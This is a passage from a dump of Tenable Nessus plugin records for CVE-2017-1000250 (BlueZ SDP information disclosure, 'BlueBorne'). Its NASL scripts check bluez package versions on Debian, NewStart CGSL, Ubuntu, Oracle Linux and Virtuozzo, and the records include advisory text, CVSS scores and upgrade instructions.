script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bluez\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/bluez\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3972\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bluez packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"bluetooth\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-cups\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-dbg\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-hcidump\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-obexd\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-test-scripts\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth-dev\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth3\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth3-dbg\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluetooth\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-cups\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-dbg\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-hcidump\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-obexd\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-test-scripts\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-test-tools\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth-dev\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth3\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth3-dbg\", reference:\"5.43-2+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:03:21", "description": "The remote NewStart CGSL host, running version MAIN 4.05, has bluez packages installed that are affected by a\nvulnerability:\n\n - An information-disclosure flaw was found in the\n bluetoothd implementation of the Service Discovery\n Protocol (SDP). A specially crafted Bluetooth device\n could, without prior pairing or user interaction,\n retrieve portions of the bluetoothd process memory,\n including potentially sensitive information such as\n Bluetooth encryption keys. (CVE-2017-1000250)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL MAIN 4.05 : bluez Vulnerability (NS-SA-2019-0117)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0117_BLUEZ.NASL", "href": "https://www.tenable.com/plugins/nessus/127358", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0117. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127358);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000250\");\n\n script_name(english:\"NewStart CGSL MAIN 4.05 : bluez Vulnerability (NS-SA-2019-0117)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 4.05, has bluez packages installed that are affected by a\nvulnerability:\n\n - An information-disclosure flaw was found in the\n bluetoothd implementation of the Service Discovery\n Protocol (SDP). A specially crafted Bluetooth device\n could, without prior pairing or user interaction,\n retrieve portions of the bluetoothd process memory,\n including potentially sensitive information such as\n Bluetooth encryption keys. (CVE-2017-1000250)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0117\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bluez packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000250\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL MAIN 4.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 4.05');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL MAIN 4.05\": [\n \"bluez-4.66-2.el6_9\",\n \"bluez-libs-4.66-2.el6_9\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-01T07:23:36", "description": "It was discovered that an information disclosure vulnerability existed\nin the Service Discovery Protocol (SDP) implementation in BlueZ. A\nphysically proximate unauthenticated attacker could use this to\ndisclose sensitive information. (CVE-2017-1000250).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-13T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : bluez vulnerability (USN-3413-1) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bluez", "cpe:/o:canonical:ubuntu_linux:17.04", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:libbluetooth3", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3413-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103187", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3413-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103187);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"USN\", value:\"3413-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : bluez vulnerability (USN-3413-1) (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that an information disclosure vulnerability existed\nin the Service Discovery Protocol (SDP) implementation in BlueZ. A\nphysically proximate unauthenticated attacker could use this to\ndisclose sensitive information. (CVE-2017-1000250).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3413-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez and / or libbluetooth3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bluez\", pkgver:\"4.101-0ubuntu13.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libbluetooth3\", pkgver:\"4.101-0ubuntu13.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"bluez\", pkgver:\"5.37-0ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libbluetooth3\", pkgver:\"5.37-0ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"bluez\", pkgver:\"5.43-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libbluetooth3\", pkgver:\"5.43-0ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / libbluetooth3\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:51:45", "description": "From Red Hat Security Advisory 2017:2685 :\n\nAn update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "edition": 28, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-13T00:00:00", "title": "Oracle Linux 6 / 7 : bluez (ELSA-2017-2685) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-13T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bluez-libs", "p-cpe:/a:oracle:linux:bluez-compat", "cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:bluez-gstreamer", "p-cpe:/a:oracle:linux:bluez-hid2hci", "p-cpe:/a:oracle:linux:bluez", "p-cpe:/a:oracle:linux:bluez-cups", "p-cpe:/a:oracle:linux:bluez-libs-devel", "p-cpe:/a:oracle:linux:bluez-alsa", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/nessus/103166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2685 and \n# Oracle Linux Security Advisory ELSA-2017-2685 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103166);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"RHSA\", value:\"2017:2685\");\n\n script_name(english:\"Oracle Linux 6 / 7 : bluez (ELSA-2017-2685) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2685 :\n\nAn update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-September/007202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-September/007204.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-hid2hci\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bluez-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-alsa-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-compat-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-cups-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-gstreamer-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-libs-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-libs-devel-4.66-2.el6_9\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-cups-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-hid2hci-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-libs-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-libs-devel-5.44-4.el7_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-alsa / bluez-compat / bluez-cups / bluez-gstreamer / etc\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:14:40", "description": "An update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 14, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-11-27T00:00:00", "title": "Virtuozzo 6 : bluez / bluez-alsa / bluez-compat / bluez-cups / etc (VZLSA-2017-2685)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2018-11-27T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:bluez", "p-cpe:/a:virtuozzo:virtuozzo:bluez-cups", "p-cpe:/a:virtuozzo:virtuozzo:bluez-libs-devel", "p-cpe:/a:virtuozzo:virtuozzo:bluez-compat", "p-cpe:/a:virtuozzo:virtuozzo:bluez-gstreamer", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:bluez-alsa", "p-cpe:/a:virtuozzo:virtuozzo:bluez-libs"], "id": "VIRTUOZZO_VZLSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/nessus/119224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119224);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000250\"\n );\n\n script_name(english:\"Virtuozzo 6 : bluez / bluez-alsa / bluez-compat / bluez-cups / etc (VZLSA-2017-2685)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: 